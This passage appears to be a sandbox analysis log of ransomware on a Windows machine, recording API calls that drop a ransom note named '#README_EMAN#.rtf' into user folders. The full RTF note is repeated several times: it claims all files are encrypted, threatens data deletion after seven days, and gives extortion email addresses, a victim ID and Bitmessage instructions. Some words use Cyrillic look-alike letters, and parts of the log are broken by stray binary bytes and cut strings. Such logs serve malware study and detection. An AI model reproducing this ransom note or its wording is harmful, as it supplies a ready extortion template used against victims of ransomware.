w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.582] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.582] CloseHandle (hObject=0x2c8) returned 1 [0278.583] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\#readme_eman#.rtf")) returned 0xffffffff [0278.583] GetLastError () returned 0x2 [0278.583] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.583] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.583] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.583] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 